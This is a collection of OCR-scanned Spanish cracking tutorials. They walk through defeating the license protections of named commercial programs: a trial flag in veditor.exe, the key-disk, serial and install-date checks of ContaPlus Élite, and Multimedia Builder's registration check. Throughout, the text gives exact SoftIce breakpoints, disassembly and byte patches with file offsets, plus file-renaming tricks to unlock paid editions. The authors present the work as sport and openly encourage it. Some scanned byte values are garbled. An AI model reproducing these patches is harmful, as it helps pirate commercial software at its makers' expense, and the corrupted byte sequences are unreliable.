:0052714E C70001000000 mov dword ptr [eax], 00000001 
:00527154 8B442410 mov eax, dword ptr [esp+10] 


* Possible Reference to String Resource ID=00001: "VE" 


:00527158 C70101000000 mov dword ptr [ecx], 00000001 


* Possible Reference to String Resource ID=00001: "VE" 


:0052715E C70201000000 mov dword ptr [edx], 00000001 
:00527164 C70000000000 mov dword ptr [eax], 00000000 
:0052716A C21000 ret 0010 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00527140(C) 

:0052716D 3D15050000 cmp eax, 00000515 //Flag maestro para entrar en forma trial. 
:00527172 752B jne 0052719F 

:00527174 8B44240C mov eax, dword ptr [esp+0C] 

:00527178 8B4C2408 mov ecx, dword ptr [esp+08] 

:0052717C 8B542404 mov edx, dword ptr [esp+04] 

* Possible Reference to String Resource ID=00001: "VE" 

:00527180 C70001000000 mov dword ptr [eax], 00000001 

:00527186 8B442410 mov eax, dword ptr [esp+10] 

* Possible Reference to String Resource ID=00001: "VE" 

:0052718A C70101000000 mov dword ptr [ecx], 0000000 

* Possible Reference to String Resource ID=00001: "VE" 

:00527190 C70201000000 mov dword ptr [edx], 0000000 

* Possible Reference to String Resource ID=00001: "VE" 

:00527196 C70001000000 mov dword ptr [eax], 0000000 //Actualiza el flag [590£f0] 
:0052719C €21000 ret 0010 


Asi pues, existe un flag maestro, si es 0x514 entramos de forma normal y registrada, 
y 0x515 de forma trial. El cambio es claro 


:00527140 752B jne 0052716D por :00527140 EBOO jmp 00527142 
(0x126540 offset en veditor.exe) 


Listo, una cruz menos en nuestra conciencia. 


NAGS Y OTRAS ESTUPIDECES 


El trabajo duro está hecho, no queda mas que eliminar un par de nags. 
La pista esta en nombres luminosos como u32cfg:ulcCheckLegality 
Basta cambiar en el ofsset 0x404 del fichero u32cfg: 6A 00 por EB 13 


Bueno, eso es todo, pero recuerda. 

Busca la fuente, busca a +ORC en la Red 
Hasta la próxima. 

estadoporcinoO hotmail.com 
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PD PARA EL PROGRAMADOR 


INTRODUCCIÓN 


Victima: CONTAPLUS ÉLITE PYME 
Site: www.gruposp.com 
HERRAMIENTAS: 


Desensamblador. Por ejemplo w32dasm 
Editor hexadecimal. Por ejemplo uedit 
Paciencia y Confianza. 


Saludos familia. Aprovecho los ratos para escribir algunas cosillas. 

En esta ocasión acometemos uns joyita con Discos llave, Números de serie,encriptación, 
descompresión en tiempo de ejecución y misterios insondables. 

Un dulce para pasar el rato. 


Llegó a mis manos una petición de crack. Normalmente la desestimo, a menos que la pida un 
amigo, me interese o favorezca mi entorno de trabajo. 

Es mejor enseñar a crakear que enseñar a llorar para suplicar. 

En fin, toda esa filosofía expuesta por +ORC y reescrita por E+P. Son las 8:00 de la mañana 
y me he pasado toda la noche crakeando. 

Si señor, hay pocos placeres comparables. 

Los crackers me entenderán perfectamente de lo que les hablo:-). 

El peluo maulla desesperao y la gorda duerme a mi lado. 

A veces la vida te sonríe y no sabes porqué.Aprovéchala antes de que cambie. 


En este entorno , nada se puede resistir... 


AL ATAQUEEEEEEE 


Miremos nuestro producto. Se trata de un clásico de la facturación española. Contaplus 
Pyme Elite Otoño 98 del 1-11-98 
Un paquete en formato CD que se compone de: 


ContaPlus 

FacturaPlus 

NominaPlus 

PersonalPlus 

Utilidades (Antivirus Norton, Antivirus Mcafee, Sidekick y PC Anywhere) 


La web la tenemos en Www.gruposp.com. 
Despendolemos un ratico por su web a ver a cuanto tienen el timo. 


Uhmm 2 millones de ventas y nuestro producto 165.000 pelas, !!! 
Precio especial !!!! 

Joer, pos si que, pa una urgencia, vamos. 

Se merecen que lo crackeen, si señor. 


PROTECCIONES ESPAÑOLAS 


A primera vista, el programa es español y por tanto la protección también. Conociendo los 
antecedentes de protecciones españolas, estimo que estará roto en 5 minutos. Sólo recuerdo 
una protección española cojonuda. Era de un catalán y se la había puesto a su programa de 
rompecabezas. Si sería buena que fue uno de los "coladores''para la +HCU con +ORC y 
+Fravia(a ver si se recupera pronto, leñe) 


PRIMERA APROXIMACION Y PRIMER ENFADO 


Empezamos mal, intentamos instalar el contaplus y nos pide un disquete llave. Joder, ¿no 
habían pasado al olvido esas protecciones basadas en discos llave?. ¿Es que no aprenden?. 
Los discos llave fueron desechados porque 

no eran fiables, se podían cascar en el trayecto de la fábrica al usuario y luego vete a reclamar 
al maestro armero una vez que has pagado el producto, eso sin contar 

el tiempo de espera del nuevo disquete, y que el que te manden no esté roto. 

Para colmo, estos discos se formatean a medida por lo que no se pueden 

copiar (en general) ni siquiera para sacar una triste copia de seguridad. 

Como veis, una mierda, y los del CONTAPUS dale que dale. 


OBJETIVOS 


Estan claros, cepillarse al CONTAPLUS y obviar el disco llave. 
Pero conseguiremos bastantes cositas más. 


SEGUNDA APROXIMACIÓN Y SEGUNDA OSTIA. LAS COSAS SE COMPLICAN 


Si intentamos instalar sin disco llave nos aparece una estúpida ventana: 
"Inserte disco llave, Por favor retire el disco actual y bla,bla,bla'' 

La ventanita tiene pinta de dialogbox, así que nos vamos al SoftIce y ponemos 
unas bonitas trampas para osos. 


bpx dialogbox 
bpx dialogboxparama 


Lanzamos al niño y el que pica es el bpx dialogboxparama. 

Con f12 aparece la ventana de error, pulsamos NO y caemos en kernel!alloc. 
Ostias que feo. F12 antes pa asomar el pescuezo en 

:10012739 dentro del proceso -GLC000x. (la x es variable). 


Ostias, que mierda es esta, ¿dónde está es fichero ese tan raro?. 

En el directorio del conta no, seguro. 

¿Pero entonces dónde?. Si buscamos el ficherito no está en el disco duro. 

Entonces, ¡por la madre de MITRA!, ¿que coño pasa?. 

Pensad una posible solución antes de pasar al siguiente párrafo, que os van a salir almorranas 
cerebrales. 


LA SOLUCIÓN A LA PELUA CUESTIÓN 


Pos si, seguro que ya lo habeis acertado :-) 

El puto fichero se crea en tiempo de ejecución y se borra antes salir. 

Por eso no aparece en el directorio de instalación ni en el disco duro al finalizar. 

Pero entonces, segunda e importante cuestión: 

¿como mangonearemos si se genera en tiempo de ejecución? 

Es vital poder toquetear para saltarse la protección. 

Así pues, relegamos el estudio del 

para centrarnos en como se puede modificar un fichero que se crea en tiempo de ejecución. 


MODIFICACIÓN DE FICHEROS CREADOS EN TIEMPO DE EJECUCIÓN 


Las variantes que se me ocuren de menos a más elegantes son: 


1 Entender como se crea el fichero y retocarlo antes de que se cree. 

2 Parchearlo en memoria una vez creado 

- mediante un parche en tiempo de ejecución. 

- Aplicando ingeniería inversa para localizar y redirigir un trozo de código 

inútil dentro del ejecutable y que parchee el fichero. 

3 Dejar que se cree en memoria pero redirigirlo a un fichero en disco ya retocado. 


Recuerdo cierta protección del mismo tipo en el Hotmetal 4.0. antes que los encerraran en la 
inutilidad del vbox. 


INTENTO SER UN TIO ELEGANTE, PERO NO ESTÚPIDO 


Pues eso, intento ser un tio elegante y opto por la primera opción y descubro lo siguiente: 


* Dentro del fichero instalar.exe del contaplus reside el famoso -GLCO000x. 

En tiempo de ejecución se lee un trozo del fichero instalar.exe, se marea un poco y se 
construye el nuevo fichero. 

El nombre se construye a partir de una cadena constante :-GLC %04x.tmp. 

Podeis abrir el fichero instalar.exe y cambiar el nombre por algo más decente. 

Tengo destripado y pasado a C el algoritmo que extrae del fichero instalar.exe los bytes, los 
marea un poco y los escribe en el -GLC%04x.tmp. 

Si quereis más datos del algoritmo mandadme un mail. 


* Me quedaba la duda de si el autor de la protección había encriptado, comprimido o 
encriptado/comprimido. 

La respuesta es sólo comprimido siguiendo un complicado algoritmo que tengo casi analizado. 
Asi pues sólo queda otra semana para crear un compresor (el descompresor ya lo tengo, está 
en el propio programa). 


* Como la cosa se complicaba, deseche esta vía y me fui a la opción 2. 
Pronto la desistimé porque no sabía cuantos parches tenía que aplicar. 


Así pués, me fui a la vía 3. Ya sé, ya sé, es la más cutre, pero rula :-) 


CAER EN LA CUENTA 


Concurrida audiencia, por si no os habeis dado cuenta, la protección es muy buena. 
RESPETAD AL PROGRAMADOR que se ha entretenido en comprimir sus datos 
y descomprimirlos en tiempo de ejecución. 

Buen trabajo BBYYMMAARRCCOOSS. 

Quizás no esté todo perdido dentro del panorama de programadores españoles. 
Aupa muchachos!!! 


OPCION 3 CAÑERA 


Lo primero es pillar una copia chachi del “GLC% 04x.tmp pa poder 

modificarla tranquilamente y después regirigir el programa para que cargue nuestra dll y no la que ha creado. 
Para ello, lanzamos el instalar y aparece la venta de error con "si" y "no". 

Nos vamos al explorador de Windows con la teclilla nueva con el logo del windoze 

(ostias, pero si sirve pa algo y to), o bien lo abrimos antes que el instalar y conmutamos con ALT+TAB. 
Estamos seguros que el fichero debe de existir porque aún no ha acabado el programa (nos da la opción de continuar 
si pusamos "'si''), 

Buscamos en el explorador los ficheros que empiezen por -GLC y bingo, 

lo tenemos en ciwindows. Con mucho cuidado lo copiamos y lo pegamos en un sitio seguro. 

Nuestra cena ya está en la red :-=). 

Para los descuidados como yo, habilitarle la opción de sólo lectura con el botón derecho 

del ratón y propiedades. Sino lo perderemos cuando lo utilizemos. 

Recordad quitarle lo de sólo lectura para parchearlo. 


Do quiera que un fichero se cargue en memoria y se ejecute en tiempo de ejecución este debe ser una dll. 

Ya sé, ya sé, no tiene extendión dll ni ná, pero no es necesario. 

Para que un fichero sea considerado dll basta con tener nombre y extensión, y la constante -GLC %04x.tmp lo 
cumple. 

Por tanto, instalar debe cargarlo como librería. Si lo desensamblamos, vemos que usa la función del api 
KERNEL32.LoadLibraryA y además sólo una vez. 


:004024F7 740A je 00402503 
:004024F9 E87E060000 call 00402B7C 
:004024FE E9BDO00000 jmp 004025C0 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004024F7 (C) 


:00402503 8D85E8FEFFFF lea eax, dword ptr [ebp+FFFFFEES] 
:00402509 50 push eax; Nombre churro de la librería -GLC%04x.tmp 


* Reference To: KERNEL32.LoadLibraryA, Ord:0190h 


:0040250A FF1534304000 Call dword ptr [00403034] 


Ahora hay que aplicar un poco de ingeniería inversa para transformar y que cargue siempre nuestra librería retocada. Os ahorro el 
proceso mental y obtenemos después de verificar que nunca se pasa por 
:004024F9 (con un bpx por ejemplo) 


:004024F7 8D85E8FEFFFF lea eax, dword ptr [ebp+FFFFFEE8];Dirección del nombre de la dll a cargar 


:004024FD C700432E6100 mov dword ptr [eax], 00612E43 ¿Constante .a0 y aprovechamos la c inicial 
de [eax] nos queda c.a 

:00402503 8D85E8FEFFFF lea eax, dword ptr [ebp+FFFFFEES];Guardamos las modificaciones. 

:00402509 50 push eax 


* Reference To: KERNEL32.LoadLibraryA, Ord:0190h 


:0040250A FF1534304000 Call dword ptr [00403034] 


Con esto siempre se carga la librería 'c.a''. Así pues renombramos la -GLC %04x.tmp que habiamos pescado antes como ''c.a" . Ya sé, el 
nombre es un poco cutre, pero si no os gusta retocarlo vosotros. No se os olvide indicar que es de sólo lectura si no lo queréis perder. 


Si repetimos lo del bpx dialogboxparama aparecemos en el proceso C!text (nuestro fichero c.a). Vamos por el buen camino. To este rollo 
pa redirigir un puto fichero, la protección debe ser la ostia. Estoy ansioso :-) 


Resumiendo, buscamos en el instalar.exe 74 0A ES 7E 06 00 00 y lo encontramos en 0x18F7 y cambiamos por 8D 85 ES FE FF FF C7 00 
43 2E 61 00 


VUELTA A LA PROTECCIÓN 


Ya podemos mangonear tranquilos nuestro C.a. 

Ahora hay que localizar donde se llama al disco llave y neutralizarlo. 

Los accesos al disco se pueden hacer de forma cutre y a alto nivel con 'deviceiocontrol'' 

o bien usando las interrupciones a pelo. Como podeis sospechar, se han usado los deviceiocontrol. 
Si en el softlce ponemos un bpx deviceiocontrol aparecemos en una dll mu fea GLfxxxx.tmp. 
Esto suena al mismo truquillo de descompresión en tipo de ejecución. 

Si pusamos unas 20 veces f12 reaparecemos en nuestra querida c.a 


:10015244 FF24858E540110 jmp dword ptr [4*eax+1001548E] 

:1001524B FF550C call [ebp+0C] ¡Llamada a la feisima glfxxxx.tmp 
:1001524E E93C010000 jmp 1001538F 

:10015253 FF75B4 push [ebp-4C] 

:10015256 FF550C call [ebp+0C] ¡2% Llamada 


Os ahorro el trabajo y os comento como funciona el esquema de protección a este nivel. 
Se crean 2 dll en tiempo de ejecución en el mismo estilo que ya hemos comentado. 
Estas dll se encargan de todo el acceso al disco llave. 

Los parámetros a las dll se pasan (agarraos) en cadenas ascii. 

Basta con poner un bpx 1001524B y echar un vistazo a esi y edi. 

Obtendremos parámetros del tipo 

3HayDisco 

3Esdisco 

3Instalaciones 


ESTÚPIDO VELO 


Corramos un estúpido velo en esta parte de la protección, porque es la más patética. 
Baste decir dos cosas, para anular completamente al disco hay que parchear :1001524B. 
En :1001524B se comprueba que existe disco, que el disco tiene el formato adecuado, 

se leen el número de licencias . 

Si existe algún error devuelven en eax=0, sino devuelven eax=1 

Así pues cambiamos 


:10015244 FF24858E540110 jmp dword ptr [4*eax+1001548E] 

:1001524B FF550C Call [ebp+0C] 

:1001524E E93C010000 jmp 1001538F 

:10015253 FF75B4 push [ebp-4C] 

:10015256 FF550C call [ebp+0C] ¡2% Llamada 
Por 

:1001524B 33 CO xor eax,eax 

:1001524D 40 inc eax 

:1001524E E93C010000 jmp 1001538F 

:10015253 33 CO xor eax,eax 

:10015255 33 CO xor eax,eax 

:10015257 40 inc eax 

:10015257 90 nop 


Buscamos FF 24 85 8EÉ 54 01 10 en c.a y lo encontramos 

en 0x1464B donde ponemos 33 CO 40 E9 3C 01 00 00 33 CO 33 CO 40 90 

Con esto quedan fulminados los accesos a disco. 

Si seguimos adelante nos pide un número de serie que se puede obviar si parcheamos en 


:1001525E FF75B8 push [ebp-48] 
:10015261 FF75B4 push [ebp-4C] 
:10015264 FF550C call [ebp+0C]; eax=0 si todo va bien. 


:10015267 E923010000 jmp 1001538F 


por 


:1001525E 33C0 xor eax, eax 
:10015260 33C0 xor eax, eax 
:10015262 33C0 xor eax, eax 
:10015264 33C0 xor eax, eax 
:10015266 90 nop 

:10015267 E923010000 jmp 1001538F 


Si no parcheamos los push el programa casca. 

Resumiendo, buscamos en c.a ff 75 b8 ff 75 b4 ff 55 0C E9 23 01 00 00 

y lo encontramos en 0x1465E, cambiándolo por 33 c0 33 c0 33 c0 33 c0 90 

Cuando pida el serial podemos introducir cualquier churro numérico p.e: 111-1-696969-11 
En el nombre de la empresa y nombre del usuario introducimos más de dos caracteres. 


Curiosamente todas estas rutinas GLC de acceso a disco y check del serial, aparecen como 
una dll normal spptr.dil en el directorio de instalación. Para qué, mu sencillo, 

para deinstalar y eliminar una licencia del disco llave. 

En teoría hay un número límite de instalaciones, cada vez que se instala 

el programa se elimina una licencia del disco llave y cada vez que se desistala se añade una. 


¿ÉXITO? 

Si seguimos todos los pasos, la instalación finaliza correctamente . 

Ávidos lanzamos el programa y crash.''Aplicación instalada incorrectamente". 
¿En qué nos hemos equivocado?. Pensad un poco. 


SOLUCIONES VIABLES 


Seguro que habéis llegado a la misma conclusión que yo. 

Las rutinas de manejo de disco que hemos inutilizado, dejaban algun flag en algún sitio 
que indicara que el programa estaba bien instalado. 

Así pues hay quedan dos opciones: 


1 Saltar la comprobación en el programa principal. 
2 Activar ese flag. 


HORROR Y ESPANTO 


Seleccionando la opción 1 nos encontramos en un avispero. 

El progrma principal está hecho en CLIPPER. 

Qué horror, aún se siguen usando esas herramientas del demonio. 

Si queréis pasarlo realmente mál intendad, trazar un programa en clipper. 

El control se realiza por bucles 

de salto del tipo call[ax+4] que conducen a otros bucles de salto call [ebx+6], hasta el inifito. 
Todo está dirigido por tabla y en código de 16bits. 

Osea nada de usar la potencia de los registros de 32 bits. 

Una montaña de mierda, como podreis observar. 

Nada recomendabe ni saludable. 

Optamos por la opción 2. Para eso llamamos a nuestro amigo y le pedimos que nos comprima 
el CONTAPLUS (bien instalado) en 

disquetes para compararlo con el que tenemos. Busque las diferencias. 


EL MISTERIO INSONDABLE 


Si descomprimimos el CONTAPLUS bien instalado en nuestro disco duro nos llevamos 
una desagradable sorpresa. ''Aplicación mal instalada". 

Joder, que coño pasa, pero si lo hemos copiado de uno que estaba bien instalado. 

A ver, a lo mejor accede al registro del sistema buscando algo raro. 

Lanzamos el regmon y vemos que la aplicación accede pero busca cosas nada importantes. 
Podréis pensar, bueno quizás busque un fichero extraño que no hayamos copiado. 
Lanzamos en filemon y sólo accede al win.ini fuera de su directorio. 

Miramos el win.ini y no vemos nada sospechoso. 


¿To esto está mu bien, pero que coño mira para saber que no está bien instalado? 


Este es el misterio insondable que me ha tenido la noche en velo y que me ha hecho disfrutar 
como un enano cabezón. Pero hay más, si copiamos el directorio de instalación en el disco duro 
donde se instaló originalmnte, el programa deja de funcionar. 

Quedan eliminados los flags en el registro del sistema y el acceso a ficheros raros, 

como ya suponíamos. Y el colmo, si copiamos y pegamos el ejecutable en el directorio de 
instalación del disco duro original de instalación el jodio programa funciona con el 

ejecutable original, pero no con la copia. ¿es mágia? 

¿hay una explicación razonable o estamos ante un expediente X ? 


Pensad el problema antes de mirad la solución, es apasionante. 
Centraos en lo extraño que es que funcione con el ejecutable original 
y no con la copia, cuando son los mismos ficheros. 


EL EXPEDIENTE X DESVIRGADO 


Lo más curioso de todo es que el programa funciona con el ejecutable original, pero no con la copia. 

En principio, esto no tiene sentido, a menos, claro está que exista una diferencia entre el original y el copiado. 
Exactamente, la fecha de creación. 

Para comprobarlo retrasé el reloj del windoze hasta la fecha hora y minuto en el que se había 

construido el ejecutable original. 


En ese preciso momento realizé una copia del origial y BINGO, la copia del ejecutable funcionaba. 

Ya hemos encontrado el flag, pero hace falta saber donde se guarda. 

En el registro del sistema no, porque no realiza ninguna operación extraña. 

Puede guardarlo en algún campo de la base de datos , osea en los fichero dbf. Para eliminar esta opción copie todos los 
ficheros 

(excepto el ejecutable) de nuestro CUENTAPLUS al directorio original, y seguia funcionando. 

En conclusión, el flag está dentro del propio ejecutable. 

¡Para comprobarlo, comparé el ejecutable original y el nuestro y he aquí las diferencias : 


FileSize: 2FA780h 
DD 2F2726h 
DB C7h 
DB 7Fh 
DD 2F2727h 
DB A2h 
DB Clh 
DD 2F272Dh 
DB 9Dh 
DB 3Dh 
DD 2F272Eh 
DB 54h 
[DB 79h 


Cambian 4 posiciones de memoria de un ejecutable a otro. 
Así pues una de las rutinas de acceso a disco que hemos 


desabilitado introduce en el ejecutable final la fecha de creación. 
Para más inri, esta fecha está encriptada y la llave de la desencriptación es BBYYMMAARRCCOOSS. 


Estos programadores nuncan aprenderán a ser humildes, los muy jodidos. 
Si cazamos las dll de disco que hemos anulado 

(copiar y pegar como ya vimos) y desensamblamos, observamos que 

se utiliza una bonita función: 

DosDateTimeToFileTime function converts MS-DOS date and time 
values to a 64-bit file time. 


BOOL DosDateTimeToFileTime ( 


WORD wFatDate, // 16-bit MS-DOS date 
WORD wFatTime, // 16-bit MS-DOS time 
LPFILETIME 1pFileTime // address of buffer for 64-bit file time 


y; 


Ponemos un bpx DosDateTimeToFileTime y lanzamos el contaplus. EUREKA, aparecemos en spptr.dll, un par de £12 más y volvemos a 
al ejecutable original. No os aburriré indicando como localizar la rutina de comprobación del flag (ya somos mayorcitos), doy 
directamente el parche: 


Cambiamos 

:10001545 8D542428 lea edx, dword ptr [esp+28] 

:10001549 51 push ecx ; BBYYMMAARRCCOOSS 
:1000154A 52 push edx 

Por 

:10001545 8D542428 lea edx, dword ptr [esp+28] 

:10001549 51 push ecx ; BBYYMMAARRCCOOSS 
:1000154A 51 push ecx ; BBYYMMAARRCCOOSS 


Buscamos en spptr.dll 8d 54 24 28 51 52 lo encontramos en 0x154A y lo cambiamos por 51 Listo y a disfrutar. 
Ya es hora de volver con la gorda y el peluo para tomar una cerveza. 


JUGUETEANDO 


*Existe una forma alternativa de corregir el problema de aplicación mal instalada. Si cogemos un dbf cualquiera del 
directorio /emp y lo copiamos con el nombre menumode.dbf , entramos en la aplicación pero en versión demostrativa, 
sin copias de seguridad y sin algunas opciones más. 


* Para convertir las copias de seguridad a la versión profesional, cambiad el nombre del fichero /emp/versione.dbf por 
/emp/versionp.dbf y /emp/menuwine.dbf /emp/menuwin.dbf . 

Esto provoca un pequeño error al mirar el "Acerca de'' en el CONTAPLUS, pero no tiene mayor importancia. 
Sospecho que con una poyada de estas más podemos pasar del CONTAPLUS élite al profesional, pero no he dado con 
la tecla. 


* Podemos copiar impunemente el directorio del CUENTAPLUS de un disco duro a otro sin necesidad de reinstalar. 


* Este mismo proceso es aplicable al NOMINAPLUS y FACTURAPLUS y el resto del paquete y muy probablemente 
al resto de productos de la empresa SP. El TVPPLUS está cascado (por lo menos en el cd) por lo que no se ha podido 
probar y el PersonalPlus no necesita retoques. PAra el resto de componenetes del paquete, simplemente se parchea el 
instalar.exe, y se copia el c.a del CONTAPLUS y se comienza la instalación. Una vez instalado, se copia el spptr.dll del 
contaplus en el directorio apropiado para cada producto (NOMINAPLUS: /exe) (FACTURAPLUS: /exe) 


* Para pasar una version demostrativa (o educativa) a versión élite, basta con aplicar el parche al spprt.dll y borrar el 
fichro /emp/menumode.dbf 


PD PARA EL PROGRAMADOR 


Querido Marco: 


Has construido una buena protección. 

He estado tentado de guardarme el crack por respeto. 

Pero lo que me decidió fue la decepción de ver como usabas Clipper y tu forma relajada de 
acceder al disco mediante deviceiocontrol. 

La próxima vez esmérate un poco más, aunque he de reconocer que he disfrutado con tu 
protección en grande. 


Notas para los lectores. 


e ”n 


1.- Los mensajes del tipo ''Hazme el crack para ....”, ''Dime como se crackea....”, ''Dime 
donde puedo encontrar...'' son automáticamente ignorados. El objetivo de estos artículos es 
enseñar a crackear no enseñar a ser unos llorones ineptos que sólo saben mendigar. 


2.- Sólo responderé a preguntas teóricas sobre cracks, indicando algunas pistas que faciliten 
la labor. 


3.- Narices, escribid artículos sobre los programas que crackeeis. 
De nada sirve lo que aprendéis si no lo repartís, se os pudre en el cabeza, palabra. 


4.- Lamento no haber contestado a ciertos mails interesantes. Desde aquí mis excusas. 
5.- Si os ha servido para algo mis artículos, no seáis vagos y mandad un mail indicándomelo. 
Estado+Porcino 


Esperamos vuestras opiniones, sugerencias y ensayos en estadoporcino O hotmail.com 


Recordad bebed de la fuente, buscad a +ORC en la red. 
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INTRODUCCIÓN 


Victima: Multimedia Builder 3.0 
Site: www.mediachance.com 
Herramienta: Nuestro amado Sice y Zen crack. 


Hoy es un día de Heineiken,Café de de Kenya,Moskovkaya,Guiness,Mahon y mujeres. 


Bueno, ya estamos de vuelta con un nuevo truco bajo el brazo: "Crack en Color'' que lo aplicaremos a nuestro conejillo de indias, 
el excelente Multimedia Builder. Un programa para crear aplicacniones que incluyen sonido, imagen,video. Se programa al 
estilovisual de VB . No os perdais el reproductor de CD que viene con el ejemplo. 


UN PRIMER VISTAZO 


Realmente este programador se lo ha currado. Ha cerrado la mayoría de las puertas de entrada a los crackers, por tanto hay que 
abrir otras como el "Crack en Color". Veamos alguno de sus ingenios del autor: 


- Existe un número de serie que se introduce desde ''HelplAboutRegister" 


- Cuando introducimos un número de serie falso no aparece ninguna ventana de error. 
Por lo que queda descartado el clásico ''bpx messageboxexa". 


- Las cadenas de caracteres importantes las tiene encriptadas, por lo que no podemos buscarlas con el ''Search and Replace", lo 
que impide un crack en 5 minutos. 


PRIMER OSTIAZO 


Desechados los ataques típicos, vamos a entrar por la puerta clásica siguiendo la pista del Serial falso. 


Metemos un número basura ''12121212", Saltamos al sice y ponemos 's 30:00 1 f££fffff "12121212"" 

¡En cada ocurrecia XX:xx aplicamos 'bpr XX:xx XX:xx+8 rw'. Una vez acabado damos al botón de OK y BOOM, aparecemos en el 
¡sice. Unos F12 llegamos a la rutina "GetwindowTextA". 

Dejamos esta línea de trabajo porque es muy aburrida. 


¡Al final conseguimos aislar una rutina en que devuelve 0 si estamos registrados y 1 en otro caso.Podemos falsearla para 
¡registrarnos. Y de hecho lo ''conseguimos"'. Nuestro nombre aparece en la ventana de registro. Pero hay una sorpresita. Si 
ejecutamos Project/Run aparece "unregistered...''. ¿Cómo es posible? 


¡Pero SI estamos registrados!. La cosa es aún peor, si nos peleamos con el registro y generamos un número de serie válido las cosas 
¡no mejorar. ¿Que está pasando aquí? 
¡ZEN CRACK 


¡Si hemos pasado el algoritmo de registro satisfactoriamente, ¿porqué seguimos sin estar registrados?. 
¡Razonemos, la única forma de no estar registrados es que no pasemos alguna verificación. Sabemos que hemos pasado una, luego 
debe de haber otra verifiación en otra parte del código. 


¡Este programador ha pensado un poco. HA SEPARADO LAS COMPROBACIONES del serial. 
'Y lo que es todavía más interesante, en cada comprobación analiza cosas diferentes. Así, si se pasa completamente una 
¡comprobación no se garantiza que se pase el resto. 


¡Sabemos ya que por lo menos hay dos comprobaciones (una que pasamos y otra no). 

¡Debe existir un nexo de unión entre las comprobaciones: Una variable que guarde el serial que hemos introducido. Pero aquín las 
variantes son múltiples :la primera comprobación puede encriptar el serial para la segunda, modificar un flag para que siempre 
resulte falsa la segunda comprobación... 


¡La pregunta que se plantea es ¿Cómo localizo la segunda comprobación?. 

¡La única pista es el horrible letrero amarillo ".. unregistered ..'. Se podrían analizar todas las variables que modifica el primer 
¡algoritmo , pero eso es demasiado costoso. Debemos buscar otra forma. 

¡La única forma de saber que no hemos pasado las comprobaciones es el letrero amarillo. Es por ahí por donde debemos atacar. 


¡El mensaje está encriptado ,luego desechamos esa vía. 
¡El letrero parece un Label al estilo de de JAVA o Delphi, por lo que no tiene entidad propia como una ventana. 
¡¿Por donde atacamos? 


CRACK EN COLORES 


Centremonos, ¿qué es lo que má llama la atención del letrero? , su color amarillo. 

¡Este color debe de asignarse de alguna forma. Además el amarillo parece que es el color de fondo del letreo. Si desensamblamos a 
¡nuestro objetivo vemos que utiliza la función setbkcolor. 

¡Así pues debemos localizar algo parecido a "setbkcolor(Amarillo)".Pero como se expresa exactamente el color amarillo. 


¡Normalmente los colores se forman a partir de la combinación de los llamados ''colores básicos” . 

¡Lo normal es usar como colores básicos RGB="Rojo Verde y Azul.' Nuestro problema es como expresar el amarillo del letrero en 
función de RGB. Por suerte nuestro amarillo es una simple combinación. Podemos utilizar la paleta de colores de cualquier 
¡programa para comprobarlo. En mi caso he usado el Visual Café 2.5 (crackeado por supuesto). 

¡Introduciendo Rojo=255,Verde=255,Azul=0 obtenemos el mismo amarillo que el del letrero. 


¡Si el color hubiera sido más complejo,capturamos la pantalla con el letrero y la importamos a un editor gráfico como el 
Photoshop.Seleccionamos un pixel del color amarillo del letreo y vemos sus componentes en términos de Rojo, Verde y Azul. 
Es posible que exita un program que realize esta función más sencilla. Si lo encontris, por favor notificádmelo. 


Asi pues debemos de localizar algo asi como "setbkcolor(255 255 0)". Necesitamos conocer si existen más parámetros para el 
¡setbkcolor. Mirando el API tenemos: 


COLORREF SetBkColor (HDC hdc, // handle of device context 
COLORREF crColor // background color value 
y; 

The COLORREF value is a 32-bit value used to specify an RGB color. 


When specifying an explicit RGB color, the COLORREF value has the following hexadecimal form: 
Ox00bbggrr 


Nuestro color es un entero y se pasa como segundo parámetro. Dado que los número se almacenan al revés debemos buscar 
SetBkColor(hdc,0000ffff). Desempolvemos los manuales del Sice, por lo que nos queda 


bpx setbkcolor if (*(esp+8)==ffff0000) 


Expliquemos un poco el churro que ha aparecido. bpx setbkcolor indica que se pare cuando se ejecute la rutina setbkcolor Se para 
cuando (*(esp+8)==00ffff), es decir, cuando el contenido del registro EIP+8 sea O0ffff. Recordemos que los parámteros a las 
funciones se pasan a través de la pila (ESP=registro stack pointer): 


Concretamente es ESP+8 porque en se apilan dos palabra de 4 bytes cada uno. 


Antes de la llamada ESP=000 
Llamada ESP=Dirección de retorno. (palabra de 4 bytes) 
ESP+4=parámetro HDC. (palabra de 4 bytes) 
ESP+8=segundo parámetro 


Aplicando nuestro bpx y pulsando "Proyect/Run'" BOOM, aparecemos en el sice, para ver si estamos realmente ante el setbkcolor 
correcto, cambiemos el color 'd esp+8' Y pasamos de '"'FFFEF00" a "FFFFFF". 
Obtenemos un bonito color blanco de fondo. Luego hemos pillado la llamada correcta. Un par de £12 después obsevamos 


:460a15 cmp [ESI+378],43CA 


Si los valores no son iguales vemos el mensaje de error. Por tanto es este el flag que controla todo. Ya sólo basta ver quien lo 
inicializa. Pero este es un trabajo conocido por todos que lo dejo como ejercicio. 


Fijaos como no se utiliza un clásico flag 1,0 sino un valor difícil 0x43CA. Un nuevo síntoma de que el autor ha leido sobre cracks. 


CONCLUSIÓN 


Hemos aprendido una nueva técnica: '"Color Crack". Es recomendable que se aplique cuando el mensaje de "unregistered ''no sea 
una ventana sino una cadena dentro de una ventana. 
Debemos averiguar el color que se aplica al mensaje y colocar en el Sice: 


bpx nombreRutina if (*(esp+8)==00BBGGRR) 
Recordad que los valores de Blue(azul),Green (Verde) , Red (rojo) están hexa. 


Cuando apararezcamos en el Sice cambiar el color para ver si estamos en la ventana correcta. En tal caso buscar un salto que evite 
el mesaje. 


Este técnica siempre es aplicable, pero se recomienda que se utulize cuando existan pocos colores en la ventana y el mensaje esté 
resaltado del resto (cosa bastante habitual). 


Una posible generalización de está técina es aplicable al color del tipo de letra (foregroundcolor), el tipo de fuente, (setFont), el 
aspecto (cursiva ...). Recordad de echar mano de una buena ayuda Api para win32. 


No olvidemos el esquema de protección tan original de SEPARACIÓN DE COMPROBACIONES que ha implementado el autor. 
Realmente interesante, si señor. 


Notas para los lectores. 


1.- Los mensajes del tipo 'Hazme el crack para ....'', "Dime como de crackea....*', ''Dime donde puedo encontrar...” son 
automáticamente ignorados. El objetivo de estos artículos es enseñar a crackear no enseñar a ser unos llorones ineptos que sólo 
saben mendigar. 


2.- Sólo responderé a preguntas teóricas sobre cracks, indicando algunas pistas que faciliten la labor. 


3.- Narices, escribid artículos sobre los programas que crackeeis. 
De nada sirve lo que aprendéis si no lo repartís, se os pudre en el cabeza, palabra. 


